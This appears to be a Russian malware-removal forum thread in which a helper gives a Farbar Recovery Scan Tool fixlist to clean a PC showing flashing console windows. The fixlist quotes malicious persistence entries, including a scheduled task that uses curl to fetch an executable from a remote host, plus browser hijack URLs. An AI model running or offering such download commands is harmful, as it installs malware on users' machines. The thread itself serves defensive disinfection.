Добрый день.
Во время работы компьютера 1 или 2 раза в 30 минут выскакивает на секунду какое-то черное окно(как будто загрузка/установка какой-то программы происходит) и потом пропадает.
Помогите пожалуйста решить проблему.
Добрый день.
Во время работы компьютера 1 или 2 раза в 30 минут выскакивает на секунду какое-то черное окно(как будто загрузка/установка какой-то программы происходит) и потом пропадает.
Помогите пожалуйста решить проблему.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) kamalakantha, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте,
- Закройте и сохраните все открытые приложения.
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-1214440339-152049171-682003330-500\...\Run: [gvnzvzqrvq] => "hxxp://granena.ru/?utm_source=uoua03n&utm_content=e739009bccd5f1e6d71a91bff5994529&utm_term=3697D7F54C18566942762CC02DB07785&utm_d=20180206" HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION HKU\S-1-5-21-1214440339-152049171-682003330-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://granena.ru/?utm_content=31b5cebd524a9af6c7a772dca81815e9&utm_source=startpm&utm_term=a791233cd00ff7d8b658408dca738900&utm_d=20180206 CHR HKLM\...\Chrome\Extension: [bejnpnkhfgfkcpgikiinojlmdcjimobi] - hxxp://clients2.google.com/service/update2/crx OPR StartupUrls: "hxxp://granena.ru/?utm_content=31b5cebd524a9af6c7a772dca81815e9&utm_source=startpm&utm_term=a791233cd00ff7d8b658408dca738900&utm_d=20180206" OPR Extension: (0) - C:\Documents and Settings\Admin\Application Data\Opera Software\Opera Stable\Extensions\jnoejnlbkbnckikbkmnpippafneemknp [2018-02-06] 2018-02-06 17:53 - 2018-02-06 20:55 - 000000318 ____H C:\WINDOWS\Tasks\DuckGo Task.job 2018-02-06 17:53 - 2018-02-06 18:55 - 000000000 ____D C:\Documents and Settings\Admin\Local Settings\Application Data\DuckGo 2018-02-06 17:53 - 2018-02-06 18:01 - 000000280 ____H C:\WINDOWS\Tasks\curls.job 2018-02-06 17:53 - 2018-02-06 17:56 - 000000490 ____H C:\WINDOWS\Tasks\curl.job 2018-02-06 17:53 - 2018-02-06 17:53 - 000000000 ____D C:\Documents and Settings\Admin\Application Data\curl 2018-02-06 17:51 - 2018-02-06 21:40 - 000000348 ____H C:\WINDOWS\Tasks\ifgker.job 2018-02-06 17:51 - 2018-02-06 20:04 - 000000000 ____D C:\Documents and Settings\Admin\Local Settings\Application Data\ifgker 2018-02-06 17:51 - 2018-02-06 17:51 - 000000000 ____D C:\Documents and Settings\Admin\Application Data\setupsk_upd 2018-02-06 17:51 - 2018-02-06 17:51 - 000000000 ____D C:\Documents and Settings\Admin\Application Data\setupsk 2018-02-06 17:49 - 2018-02-06 17:49 - 000001613 _____ C:\Documents and Settings\Admin\Рабочий стол\Поиcк в Интeрнете.lnk 2018-02-06 17:46 - 2018-02-06 17:46 - 000000226 _____ C:\Documents and Settings\Admin\Рабочий стол\Искать в Интернете.url 2018-02-06 17:48 - 2018-02-06 17:49 - 004895016 ____N ( ) C:\Documents and Settings\Admin\Local Settings\Temp\2ctutTxZXDRG.exe 2018-02-06 17:53 - 2018-02-06 17:53 - 001401840 ____N () C:\Documents and Settings\Admin\Local Settings\Temp\2pJB3eJDbBq5.exe 2018-02-06 17:46 - 2018-02-06 17:46 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\fix.exe 2018-02-06 17:46 - 2018-02-06 17:46 - 002293432 ____N () C:\Documents and Settings\Admin\Local Settings\Temp\mm6LZhbvD0GN.exe 2018-02-06 17:51 - 2018-02-06 17:51 - 002288975 ____N () C:\Documents and Settings\Admin\Local Settings\Temp\NsqR6lGxnqQn.exe 2018-02-06 17:50 - 2018-02-06 17:50 - 001401840 ____N () C:\Documents and Settings\Admin\Local Settings\Temp\VE0xLuSfayGV.exe 2018-02-06 17:49 - 2018-02-06 17:49 - 001401840 ____N () C:\Documents and Settings\Admin\Local Settings\Temp\vlyzhMso7zbS.exe Task: C:\WINDOWS\Tasks\curl.job => C:\Documents and Settings\Admin\Application Data\curl\curl_7_54.exed-f -s -L hxxp:/atotum.ru/f.exe -o C:\Documents and Settings\Admin\Application Data\curl\curl.exe Task: C:\WINDOWS\Tasks\curls.job => C:\Documents and Settings\Admin\Application Data\curl\curl.exe Task: C:\WINDOWS\Tasks\DuckGo Task.job => C:\Documents and Settings\Admin\Local Settings\Application Data\DuckGo\duckgo.exe Task: C:\WINDOWS\Tasks\ifgker.job => C:\Documents and Settings\Admin\Local Settings\Application Data\ifgker\ifgker.exe HKLM\...\exefile\shell\open\command: C:\WINDOWS\svchost.com "%1" %* <==== ATTENTION HKLM\...\regfile\shell\open\command: NOTEPAD.EXE %1 <==== ATTENTION HKLM\...\scrfile\shell\open\command: NOTEPAD.EXE %1 <==== ATTENTION Reboot:- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Ваши права в разделе
Ответить с цитированием
